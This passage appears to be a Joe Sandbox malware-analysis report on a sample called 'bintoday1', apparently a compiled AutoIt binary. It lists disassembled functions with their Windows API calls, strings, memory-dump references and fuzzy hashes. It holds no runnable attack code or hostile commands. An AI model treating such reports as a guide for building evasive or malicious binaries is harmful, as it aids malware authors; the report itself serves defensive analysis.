CoUninitialize.OLE32 ref: 00C1377F
CoCreateInstance.OLE32(?,00000000,00000017,00C2FB78,?), ref: 00C137D9
IIDFromString.OLE32(?,?), ref: 00C1384C
VariantInit.OLEAUT32(?), ref: 00C138E4
VariantClear.OLEAUT32(?), ref: 00C13936

Strings

Failed to create object, xrefs: 00C137E4, 00C1389A
NULL Pointer assignment, xrefs: 00C1381E
Invalid parameter, xrefs: 00C13865

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: a1e4eab8449faafcba24d783cdae399923e270fbb27f5f945262e2053fe1f078
Instruction ID: 770816ff6c57cb2e7c84423dd03dff72a25b28dceafca1ac2dc2610e99fd057a
Opcode Fuzzy Hash: a1e4eab8449faafcba24d783cdae399923e270fbb27f5f945262e2053fe1f078
Instruction Fuzzy Hash: DA61B2706083419FD711DF54C888BAEB7E4EF46718F10445AF995972D1C770EE88DB92

Function 00C03388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C033CF

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C033F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00C03504
^ ERROR , xrefs: 00C0349E
"%s" (%d) : ==> %s:, xrefs: 00C03522
Error: , xrefs: 00C034D1
Line %d (File "%s"):, xrefs: 00C03443, 00C0345C
Incorrect parameters to object property !, xrefs: 00C034AB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 5339b1d4dd104622248f43df5fd89b7129bbd50377af63ccd6a89fac51748d11
Instruction ID: 04dbd063ede44af4d4622066e099aad9bd9d8a305a06c479e554cdd4bd766eb5
Opcode Fuzzy Hash: 5339b1d4dd104622248f43df5fd89b7129bbd50377af63ccd6a89fac51748d11
Instruction Fuzzy Hash: 79517D31900209AADF15EBE4CD82EFEB7B8AF14741F1441B5F905721A2EB716F98DB60

Function 00BFB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BFB5FC
_wcslen.LIBCMT ref: 00BFB608
_wcslen.LIBCMT ref: 00BFB64D
_wcslen.LIBCMT ref: 00BFB68C
_wcslen.LIBCMT ref: 00BFB6C7

Strings

REMOVE, xrefs: 00BFB602, 00BFB607
EXISTS, xrefs: 00BFB686, 00BFB68B
APPEND, xrefs: 00BFB6C1, 00BFB6C6
KEYS, xrefs: 00BFB647, 00BFB64C

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 0ca88cf9195decaec63c81ce3dcdef832b7e4b8667572ce46636c7ccee6bfb06
Instruction ID: 1dd5c9be605dd0cc4a17decde5c327cef6554fd99f7ffa1b2f4a6cb52cea6aa8
Opcode Fuzzy Hash: 0ca88cf9195decaec63c81ce3dcdef832b7e4b8667572ce46636c7ccee6bfb06
Instruction Fuzzy Hash: 6641A632A0012AABCB106F7DC8909BEF7E5FF65794B2441A9E661D7284F731CD89C790

Function 00C05393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C053A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C05416
GetLastError.KERNEL32 ref: 00C05420
SetErrorMode.KERNEL32(00000000,READY), ref: 00C054A7

Strings

NOTREADY, xrefs: 00C0544B
READONLY, xrefs: 00C05452
UNKNOWN, xrefs: 00C05444
READY, xrefs: 00C05460, 00C05468
INVALID, xrefs: 00C05459

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: dfe7741c31336fcb2abdb9a231bd7ca47fef054cbe604be290687f3c36da5ad8
Instruction ID: 699e68a6f6b1819586911ccd234c01fbd5b63f04befd6d20f0d9f05ce3bc91bf
Opcode Fuzzy Hash: dfe7741c31336fcb2abdb9a231bd7ca47fef054cbe604be290687f3c36da5ad8
Instruction Fuzzy Hash: 3C319D75A006059FCB10DFA8C485BEEBBB8EB04305F548069E915CB2D2DB70DE86CF91

Function 00C23C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00C23C79
SetMenu.USER32(?,00000000), ref: 00C23C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C23D10
IsMenu.USER32(?), ref: 00C23D24
CreatePopupMenu.USER32 ref: 00C23D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C23D5B
DrawMenuBar.USER32 ref: 00C23D63

Strings

0, xrefs: 00C23C54
F, xrefs: 00C23D4E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 813d7820d0ea94a2456f184569d8c4bca540525322d43e277a36a64c57736b79
Instruction ID: 59029beedf726f11cb018bafd15ac4f5423262b18655185b93d451d04c3d02d6
Opcode Fuzzy Hash: 813d7820d0ea94a2456f184569d8c4bca540525322d43e277a36a64c57736b79
Instruction Fuzzy Hash: 4A418778A11219AFDB24CF64E888BAE7BB5FF49350F140028F956A7360D774EA10DF94

Function 00BF1EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00BF3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00BF3CCA

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00BF1F64
GetDlgCtrlID.USER32 ref: 00BF1F6F
GetParent.USER32 ref: 00BF1F8B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00BF1F8E
GetDlgCtrlID.USER32(?), ref: 00BF1F97
GetParent.USER32(?), ref: 00BF1FAB
SendMessageW.USER32(00000000,?,00000111,?), ref: 00BF1FAE

Strings

ComboBox, xrefs: 00BF1EEC
ListBox, xrefs: 00BF1F21

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: e8d20146017fa0d7cf4008c2d6d2623193bef6bc49e3b73822b82acfa9861652
Instruction ID: 31aff3b37bf26d51d2aa3db014c6751779f184e5fc373532feafae45a5fc00f5
Opcode Fuzzy Hash: e8d20146017fa0d7cf4008c2d6d2623193bef6bc49e3b73822b82acfa9861652
Instruction Fuzzy Hash: AD21B074900218BBCF14EFA4CC95AFEBBF8EF15350F004599FA61A72A1CB345909DB60

Function 00C23A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C23A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C23AA0
GetWindowLongW.USER32(?,000000F0), ref: 00C23AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C23AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C23B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C23BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C23BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C23BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C23BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C23C13

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: ac8787f9020b374ea882957d6e0aafff42ca669b363221fca753e149704ccf62
Instruction ID: 3b248e23b7ae153c550259469c189349d1725558c04e47439fc66786ff481866
Opcode Fuzzy Hash: ac8787f9020b374ea882957d6e0aafff42ca669b363221fca753e149704ccf62
Instruction Fuzzy Hash: 47616975900258AFDB20DFA8DC81FEE77F8EB09710F140199FA15A72A1D774AE41DB50

Function 00BC2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BC2C94

Part of subcall function 00BC29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000), ref: 00BC29DE
Part of subcall function 00BC29C8: GetLastError.KERNEL32(00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000,00000000), ref: 00BC29F0

_free.LIBCMT ref: 00BC2CA0
_free.LIBCMT ref: 00BC2CAB
_free.LIBCMT ref: 00BC2CB6
_free.LIBCMT ref: 00BC2CC1
_free.LIBCMT ref: 00BC2CCC
_free.LIBCMT ref: 00BC2CD7
_free.LIBCMT ref: 00BC2CE2
_free.LIBCMT ref: 00BC2CED
_free.LIBCMT ref: 00BC2CFB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 19c81468e03af758510858ad8855e8e1c433a7d1dfadbe7982bcebf9b9052770
Instruction ID: b0cb16e32b4f84fb95c9b56d9828c35b3f85410d6db251085702261860eca1d0
Opcode Fuzzy Hash: 19c81468e03af758510858ad8855e8e1c433a7d1dfadbe7982bcebf9b9052770
Instruction Fuzzy Hash: 6C117476510108AFCB02EF54D982EDD3BA5FF05350F5145A9FA889F322DA71EE509B90

Function 00B91410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B91459
OleUninitialize.OLE32(?,00000000), ref: 00B914F8
UnregisterHotKey.USER32(?), ref: 00B916DD
DestroyWindow.USER32(?), ref: 00BD24B9
FreeLibrary.KERNEL32(?), ref: 00BD251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BD254B

Strings

close all, xrefs: 00B91454

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 0777847e4b3ec480e0482f625271dfaf5008b0e5010361c3373fa4658bec24e1
Instruction ID: 12219f283077142913c02f17742734975bcfd854f88be45e59e0e6d08ac32865
Opcode Fuzzy Hash: 0777847e4b3ec480e0482f625271dfaf5008b0e5010361c3373fa4658bec24e1
Instruction Fuzzy Hash: 24D169316012128FCB29EF58D895A29F7E4BF25700F1546EEE44A6B361DB30EC12DF50

Function 00C07DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C07FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00C07FC1
GetFileAttributesW.KERNEL32(?), ref: 00C07FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00C08005
SetCurrentDirectoryW.KERNEL32(?), ref: 00C08017
SetCurrentDirectoryW.KERNEL32(?), ref: 00C08060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C080B0

Strings

*.*, xrefs: 00C08066

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 7d72086662c1eebec7bceb885cde5ed5841fd561ad2bf7feb296643d462c7fb2
Instruction ID: af27d65f77b1f3bbdd94955034293990bbb114104208f783d9a45b5d531b64b3
Opcode Fuzzy Hash: 7d72086662c1eebec7bceb885cde5ed5841fd561ad2bf7feb296643d462c7fb2
Instruction Fuzzy Hash: E181B4729082059FCB24DF15C444AAEB7D8BF84314F548D6EF8A5C7290EB35EE49CB52

Function 00B95BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00B95C7A

Part of subcall function 00B95D0A: GetClientRect.USER32(?,?), ref: 00B95D30
Part of subcall function 00B95D0A: GetWindowRect.USER32(?,?), ref: 00B95D71
Part of subcall function 00B95D0A: ScreenToClient.USER32(?,?), ref: 00B95D99

GetDC.USER32 ref: 00BD46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BD4708
SelectObject.GDI32(00000000,00000000), ref: 00BD4716
SelectObject.GDI32(00000000,00000000), ref: 00BD472B
ReleaseDC.USER32(?,00000000), ref: 00BD4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BD47C4

Strings

U, xrefs: 00BD4693

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 58ef6a625b22b31b27170045e644571f1e9497b59cb07af33d835a5b0b9c40f6
Instruction ID: 0263ad69e6e54a83e3969897dc40a749bf342c7c061cd12c04f2f21cef36b087
Opcode Fuzzy Hash: 58ef6a625b22b31b27170045e644571f1e9497b59cb07af33d835a5b0b9c40f6
Instruction Fuzzy Hash: D271AC31500205DFCF228F64C984AAABBF5FF4A361F1842AAED565A2A6E7319C41DF50

Function 00C0359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C035E4

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

LoadStringW.USER32(00C62390,?,00000FFF,?), ref: 00C0360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00C03724
"%s" (%d) : ==> %s:, xrefs: 00C03742
Error: , xrefs: 00C036EF
Line %d (File "%s"):, xrefs: 00C0366B
^ ERROR, xrefs: 00C036C9

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: aae947922de600e390b9ed1f1a39041a562cc4387cbcaada2bf8d41c308dfbdf
Instruction ID: 65f60a87a65d92565039773c6318fcc8dd0e142e1859e1ad2e06303cf450ae18
Opcode Fuzzy Hash: aae947922de600e390b9ed1f1a39041a562cc4387cbcaada2bf8d41c308dfbdf
Instruction Fuzzy Hash: 29519F71800209BADF14EBA4CC82EEDBBB8EF14741F0841B9F515721A1EB711B99DFA0

Function 00C28B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

Part of subcall function 00BA912D: GetCursorPos.USER32(?), ref: 00BA9141
Part of subcall function 00BA912D: ScreenToClient.USER32(00000000,?), ref: 00BA915E
Part of subcall function 00BA912D: GetAsyncKeyState.USER32(00000001), ref: 00BA9183
Part of subcall function 00BA912D: GetAsyncKeyState.USER32(00000002), ref: 00BA919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00C28B6B
ImageList_EndDrag.COMCTL32 ref: 00C28B71
ReleaseCapture.USER32 ref: 00C28B77
SetWindowTextW.USER32(?,00000000), ref: 00C28C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C28C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00C28CFF

Strings

@GUI_DROPID, xrefs: 00C28C51
@GUI_DRAGFILE, xrefs: 00C28C9A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 7284e67ebaccd43c79cf8f604e51a4f00409ef4115bceb4f54f5eebaa564eb90
Instruction ID: 768bed810208190d1e78dfc6afed18a034029dfa97214088dd44e390049be2ec
Opcode Fuzzy Hash: 7284e67ebaccd43c79cf8f604e51a4f00409ef4115bceb4f54f5eebaa564eb90
Instruction Fuzzy Hash: 22519A70109310AFDB14DF24DC96BAE77E4FB88711F04066DF996972E1CB709A48CBA2

Function 00C0C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C0C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C0C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C0C2CA
GetLastError.KERNEL32 ref: 00C0C322
SetEvent.KERNEL32(?), ref: 00C0C336
InternetCloseHandle.WININET(00000000), ref: 00C0C341

Strings

, xrefs: 00C0C2BB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 47fe89977d842e4bf6c0c97271a4b4e85923d5ee5abf32306a742ff5920db312
Instruction ID: 4ef310b762c3fe27e7b62486f0e2ac8e930c4293a0a412ff6b3221aa4cdadc47
Opcode Fuzzy Hash: 47fe89977d842e4bf6c0c97271a4b4e85923d5ee5abf32306a742ff5920db312
Instruction Fuzzy Hash: 0D318BB1610608AFD7219FA588C8BAF7BFCEB49B44B10861EF456D2690DB34DE05DB60

Function 00BF989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BD3AAF,?,?,Bad directive syntax error,00C2CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00BF98BC
LoadStringW.USER32(00000000,?,00BD3AAF,?), ref: 00BF98C3

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BF9987

Strings

., xrefs: 00BF996D
Error: , xrefs: 00BF9955
Line %d:, xrefs: 00BF9912
Line %d (File "%s"):, xrefs: 00BF992D
%s (%d) : ==> %s.: %s %s, xrefs: 00BF98F1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
